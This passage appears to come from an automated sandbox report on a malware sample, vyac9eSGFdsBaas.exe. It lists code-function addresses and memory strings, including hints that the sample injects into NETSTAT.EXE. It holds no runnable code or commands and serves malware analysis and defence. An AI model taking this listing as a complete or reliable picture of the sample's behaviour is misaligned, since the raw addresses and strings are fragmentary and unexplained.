          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_016FD5E04_2_016FD5E0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017B25DD4_2_017B25DD
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017165A04_2_017165A0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017125814_2_01712581
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017A2D824_2_017A2D82
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0170B4774_2_0170B477
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017AD4664_2_017AD466
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_016F841F4_2_016F841F
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017A44964_2_017A4496
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017B1FF14_2_017B1FF1
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017BDFCE4_2_017BDFCE
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01706E304_2_01706E30
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017AD6164_2_017AD616
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017056004_2_01705600
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017B2EF74_2_017B2EF7
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01791EB64_2_01791EB6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0389138B12_2_0389138B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0388EB9A12_2_0388EB9A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0389EBB012_2_0389EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0392DBD212_2_0392DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_039203DA12_2_039203DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0389ABD812_2_0389ABD8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_039123E312_2_039123E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0388A30912_2_0388A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0392231B12_2_0392231B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03932B2812_2_03932B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0388AB4012_2_0388AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0390CB4F12_2_0390CB4F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_039322AE12_2_039322AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03924AEF12_2_03924AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0391FA2B12_2_0391FA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0388B23612_2_0388B236
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038899BF12_2_038899BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0386F90012_2_0386F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0388412012_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0387B09012_2_0387B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038920A012_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_039320A812_2_039320A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_039328EC12_2_039328EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0392100212_2_03921002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0393E82412_2_0393E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0388A83012_2_0388A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0393DFCE12_2_0393DFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03931FF112_2_03931FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03911EB612_2_03911EB6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03932EF712_2_03932EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0392D61612_2_0392D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0388560012_2_03885600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03886E3012_2_03886E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0389258112_2_03892581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03922D8212_2_03922D82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038965A012_2_038965A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_039325DD12_2_039325DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0387D5E012_2_0387D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03932D0712_2_03932D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03860D2012_2_03860D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_03931D5512_2_03931D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0392449612_2_03924496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0387841F12_2_0387841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0392D46612_2_0392D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_0388B47712_2_0388B477
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F8E89012_2_02F8E890
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F8E1FD12_2_02F8E1FD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F79E3012_2_02F79E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F79E2C12_2_02F79E2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F72FB012_2_02F72FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F8DF9912_2_02F8DF99
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F72D9012_2_02F72D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F72D8A12_2_02F72D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F8E52A12_2_02F8E52A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0386B150 appears 145 times
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: String function: 016EB150 appears 145 times
          Source: vyac9eSGFdsBaas.exe, 00000000.00000000.364362668.00000000007B4000.00000002.00020000.sdmpBinary or memory string: OriginalFilename4TQ.exe, vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.398412806.0000000006E50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.398404155.0000000006E30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWinRar.dll. vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.402157774.0000000007A70000.00000002.00000001.sdmpBinary or memory string: originalfilename vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.402157774.0000000007A70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.398745998.0000000007040000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.399135892.0000000007970000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000003.00000002.387024042.00000000001F4000.00000002.00020000.sdmpBinary or memory string: OriginalFilename4TQ.exe, vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000004.00000002.436577205.000000000196F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000004.00000002.437188886.0000000001A00000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs vyac9eSGFdsBaas.exe
          Source: vyac9eSGFdsBaas.exe, 00000004.00000002.432351350.0000000000CA4000.00000002.00020000.sdmpBinary or memory string: OriginalFilena